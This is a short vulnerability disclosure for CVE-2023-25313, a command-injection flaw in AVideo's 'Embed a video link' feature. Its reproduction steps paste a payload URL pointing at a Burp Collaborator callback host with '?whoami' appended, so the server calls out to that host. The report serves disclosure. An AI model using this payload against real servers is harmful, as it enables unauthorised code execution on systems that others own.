Headline
CVE-2023-25313: RCE when embedding a video link
OS injection vulnerability in World Wide Broadcast Network AVideo version before 12.4, allows attackers to execute arbitrary code via the video link field to the Embed a video link feature.
Description:
I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server
Impact:
An attacker could execute remote codes on your system
Step to Reproduce:
- Go to My Videos tab
https://demo.avideo.com/mvideos
Click “Embed a video link”
Get your Burp Suite Collaborator link
Example:
o4ta880iz4vap09kaqw400po8fe52u.oastify.com
- Now put this RCE payload in the Video Link field
http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?whoami
then click Save
- Now go to BurpSuite Collaborator client and see the response
Video POC: https://youtu.be/aN8JZVc5zFM
Credits
- Jefferson Gonzales (Gonz)
- Link https://twitter.com/gonzxph